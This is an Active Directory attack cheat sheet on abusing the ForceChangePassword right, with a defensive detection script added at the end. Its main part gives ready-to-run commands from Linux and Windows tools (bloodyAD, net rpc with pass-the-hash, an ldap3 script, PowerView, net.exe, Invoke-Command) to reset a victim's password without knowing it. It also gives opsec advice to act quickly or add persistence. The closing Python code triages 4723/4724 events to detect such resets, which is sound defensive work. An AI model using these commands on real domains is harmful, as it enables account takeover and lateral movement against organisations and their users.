ForceChangePassword
Source can reset target user's password without knowing the current password
Applies to: User/Group/Computer → User
Linux Abuse
bloodyAD
bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> set password <target-user> '<new-password>'
impacket net rpc
net rpc password <target-user> '<new-password>' -U <domain>/<username>%'<password>' -S <dc-ip>
With hash (pass-the-hash)
bloodyad -u <username> -p :<ntlm-hash> -d <domain> --host <dc-ip> set password <target-user> '<new-password>'
Via LDAP (ldap3 script, same idea as ldapmodify → requires knowing the unicodePwd encoding)
python3 -c "
from ldap3 import Server, Connection, MODIFY_REPLACE
# unicodePwd is only writable over an encrypted channel, hence LDAPS
s = Server('<dc-ip>', use_ssl=True)
c = Connection(s, '<domain>\\\\<username>', '<password>', auto_bind=True)
# AD expects the new password wrapped in double quotes and UTF-16-LE encoded
new_pass = '\"<new-password>\"'.encode('utf-16-le')
c.modify('CN=<target-user>,CN=Users,DC=<domain>,DC=<tld>',
         {'unicodePwd': [(MODIFY_REPLACE, [new_pass])]})
print(c.result)
"
Windows Abuse
PowerView
$cred = New-Object System.Management.Automation.PSCredential('<domain>\<username>', (ConvertTo-SecureString '<password>' -AsPlainText -Force))
$pass = ConvertTo-SecureString '<new-password>' -AsPlainText -Force
Set-DomainUserPassword -Identity <target-user> -AccountPassword $pass -Credential $cred
CMD / net.exe
net user <target-user> <new-password> /domain
RPC (runas context)
$cred = New-Object System.Management.Automation.PSCredential('<domain>\<username>', (ConvertTo-SecureString '<password>' -AsPlainText -Force))
Invoke-Command -ComputerName <dc-ip> -Credential $cred -ScriptBlock {
Set-ADAccountPassword -Identity '<target-user>' -Reset -NewPassword (ConvertTo-SecureString '<new-password>' -AsPlainText -Force)
}
Opsec
- Generates event 4723 (password change attempt, old password supplied) and 4724 (password reset attempt by another principal) on the DC; the reset methods above produce 4724, with the acting account in the Subject fields
- The target user will notice their password changed on next login; use quickly or combine with a persistence mechanism
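From the defender's side, the 4724 events noted above are the signal to build on. The following is an added example, not part of the original cheat sheet, that triages constructed 4723/4724 records as a SIEM pipeline might emit them: a reset (4724) by an account outside an expected helpdesk allow-list, any reset of a sensitive account, and a burst of resets against several accounts by one subject are all flagged. The event IDs are the real Windows Security IDs; the account names, allow-lists and sample records are assumptions made up for the demo.

```python
"""Triage Windows Security events 4723/4724 for password resets that look like
ForceChangePassword abuse.

Added example, not part of the original cheat sheet. Event IDs 4723 (password
change attempt, old password supplied) and 4724 (password reset attempt) are the
real Windows Security event IDs; the account names, allow-lists and sample
records below are constructed assumptions for the demo.
"""
import json
from datetime import datetime, timedelta

# Assumption: accounts that legitimately reset other users' passwords.
EXPECTED_RESETTERS = {"svc-iam", "helpdesk01"}
# Assumption: accounts whose reset should always be escalated.
SENSITIVE_TARGETS = {"administrator", "krbtgt", "da-backup"}

# Constructed sample events, one JSON object per line, in the shape a
# Windows Event Forwarding / SIEM pipeline might emit for the Security log.
SAMPLE_LOG = """\
{"EventID": 4723, "TimeCreated": "2024-05-01T09:00:00", "SubjectUserName": "alice", "TargetUserName": "alice"}
{"EventID": 4724, "TimeCreated": "2024-05-01T09:05:00", "SubjectUserName": "helpdesk01", "TargetUserName": "bob"}
{"EventID": 4724, "TimeCreated": "2024-05-01T09:07:00", "SubjectUserName": "webapp-svc", "TargetUserName": "carol"}
{"EventID": 4724, "TimeCreated": "2024-05-01T09:08:00", "SubjectUserName": "webapp-svc", "TargetUserName": "da-backup"}
{"EventID": 4724, "TimeCreated": "2024-05-01T09:09:30", "SubjectUserName": "webapp-svc", "TargetUserName": "dave"}
"""


def load_jsonl(text):
    """Parse one JSON event per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def classify(event):
    """Return (severity, reason) for one event, or None when it looks benign."""
    eid = event.get("EventID")
    subject = event.get("SubjectUserName", "").lower()
    target = event.get("TargetUserName", "").lower()
    if eid == 4723:
        # Self-service change (old password required): benign when the user
        # changes their own password.
        return None if subject == target else ("medium", f"4723 change of {target} by {subject}")
    if eid != 4724 or subject == target:
        return None
    # 4724: the subject reset the target's password without knowing the old one.
    if target in SENSITIVE_TARGETS:
        return ("high", f"reset of sensitive account {target} by {subject}")
    if subject not in EXPECTED_RESETTERS:
        return ("medium", f"reset of {target} by non-helpdesk account {subject}")
    return None


def burst_resets(events, window=timedelta(minutes=10), threshold=3):
    """Map subject -> sorted targets for subjects that reset `threshold` or more
    distinct accounts inside any `window`-long interval (a lateral-movement
    pattern rather than a helpdesk ticket)."""
    by_subject = {}
    for e in events:
        if e.get("EventID") != 4724:
            continue
        stamp = datetime.fromisoformat(e["TimeCreated"])
        by_subject.setdefault(e["SubjectUserName"].lower(), []).append(
            (stamp, e["TargetUserName"].lower()))
    flagged = {}
    for subject, items in by_subject.items():
        items.sort()
        for start, _ in items:
            targets = {t for stamp, t in items if start <= stamp <= start + window}
            if len(targets) >= threshold:
                flagged[subject] = sorted(targets)
                break
    return flagged


def triage(events):
    """Combine per-event and burst findings into a list of dicts."""
    findings = [{"severity": hit[0], "reason": hit[1], "event": e}
                for e in events for hit in [classify(e)] if hit]
    for subject, targets in burst_resets(events).items():
        findings.append({"severity": "high",
                         "reason": f"{subject} reset {len(targets)} accounts within 10 min: {', '.join(targets)}",
                         "event": None})
    return findings


SAMPLE_EVENTS = load_jsonl(SAMPLE_LOG)

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f['severity'].upper()}] {f['reason']}")
```

On the sample data the helpdesk reset of bob is ignored, each of webapp-svc's three resets is flagged on its own (the one against da-backup as high), and the burst rule raises a further high finding for webapp-svc. In a real deployment the allow-list would come from group membership rather than a hard-coded set, and a 4724 whose subject is not in it is worth a ticket even when no sensitive account is involved, because the right to reset is exactly the ForceChangePassword edge this page describes.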